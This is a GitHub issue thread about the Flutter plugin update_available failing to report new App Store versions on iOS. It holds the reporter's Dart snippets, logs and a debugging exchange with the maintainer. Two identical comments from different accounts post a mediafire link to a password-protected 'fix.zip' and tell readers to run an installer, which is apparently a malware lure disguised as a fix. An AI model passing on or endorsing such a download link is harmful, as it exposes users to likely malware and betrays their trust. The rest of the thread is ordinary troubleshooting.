### ISSUE TITLE
iOS version not working?

### ISSUE THREAD

**Issue by millerf** [mateusfccp/update_available#44]
Hi there,

Just to report that the plugin does not seem to work anymore ("at least" on iOS).

I uploaded the latest version of [my app](https://apps.apple.com/in/app/nomad-park/id6470134352) 2 days ago, and `getUpdateAvailability` keeps returning `NoUpdateAvailable()`...

I had tried a few weeks before by downgrading the test version I was building and it was working fine. For example the version on the app store was `1.2.6+195`. So I changed my `pubspec.yaml` to `version: 1.2.5+193` and I would run a `flutter run --release` on my test device, and `getUpdateAvailability()` would return `UpdateAvailable()`.

This is not the case anymore, and will only return `NoUpdateAvailable()`

- iOS version 17.5.1
- Flutter 3.24.1
```bash
flutter doctor 
Doctor summary (to see all details, run flutter doctor -v):
[✓] Flutter (Channel stable, 3.24.1, on macOS 14.6.1 23G93 darwin-arm64, locale en-ES)
[✓] Android toolchain - develop for Android devices (Android SDK version 34.0.0)
[✓] Xcode - develop for iOS and macOS (Xcode 15.4)
[✓] Chrome - develop for the web
[✓] Android Studio (version 2023.3)
[✓] Connected device (3 available)
[✓] Network resources

• No issues found!
```

The is a snippet of my code:
```dart
class AppUpdateAvailableProvider extends CustomChangeNotifier {
  bool updateAvailable = false;

  init() {
    makePeriodicTimer(const Duration(minutes: 30), _checkUpdate, fireNow: true);
  }

  Future<void> _checkUpdate(Timer _) async {
    beingLoaded = true;
    getUpdateAvailability().then((Availability updateAvailability) {
      updateAvailable = updateAvailability == const UpdateAvailable();
      if (updateAvailable) {
        notifyListeners();
      }
      maybeCompleteDataLoadedFuture();
    });
  }
```

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by millerf** [comment]
Example, running this snippet:
```dart
Future<void> _checkUpdate(Timer _) async {
    PackageInfo packageInfo = await PackageInfo.fromPlatform();
    print({
      'bundleID': packageInfo.packageName,
      'appVersion': packageInfo.version,
      'buildNumber': packageInfo.buildNumber,
      'appName': packageInfo.appName
    });
    beingLoaded = true;
    getUpdateAvailability().then((Availability updateAvailability) {
      print(updateAvailability);
      updateAvailable = (updateAvailability == const UpdateAvailable()) ||
          settings.forceAppUpdateAvailable;
      if (updateAvailable) {
        notifyListeners();
      }
      maybeCompleteDataLoadedFuture();
    });
  }
```

Outputs

```
flutter: {bundleID: com.nomad.park.front, appVersion: 1.2.6, buildNumber: 193, appName: Nomad Park}
flutter: Instance of 'NoUpdateAvailable'
```

When the published iOS version on the store is `1.2.7+198`

<img width="630" alt="Screenshot 2024-08-26 at 09 26 29" src="https://github.com/user-attachments/assets/984aaf15-36a5-4a6e-8e62-812aa3f63cbb">

**Comment by millerf** [comment]
It looks like my `update_available_ios` is stuck on 3.0.2. That could explain it...

<img width="424" alt="Screenshot 2024-08-26 at 09 30 10" src="https://github.com/user-attachments/assets/a403f7ca-45c6-47e3-9c7c-d1b3b400d68d">

**Comment by millerf** [comment]
https://itunes.apple.com/lookup?bundleId=com.nomad.park.front
Does contain the right version.

```
"version":"1.2.7"
```

I believe the `HttpClient` you are using is using some internal cache...

**Comment by millerf** [comment]
Found the issue. Creating a PR,...

**Comment by mateusfccp** [comment]
> I believe the `HttpClient` you are using is using some internal cache...

AFAICT, `HttpClient` does not do any kind of cache automatically...

**Comment by millerf** [comment]
> Do you think https://github.com/mateusfccp/update_available/issues/13 and https://github.com/mateusfccp/update_available/issues/16 may be instances of this?

I would not think so. 

Whats strikes me here is both are related to Testflight, however your code has no way to know the state of Testflight AFAIK (I don't see any data related to Testflight/Connect in the data returned by the itunes URL)...

**Comment by mateusfccp** [comment]
Hmm, this does make sense, although #13 seems to be the inverse: the iTunes API seems to be returning the version of the in-review app, while it shouldn't.

I actually can't test it myself, but it seems weird to me.

Either way, I think indeed it has nothing to do with this issue.
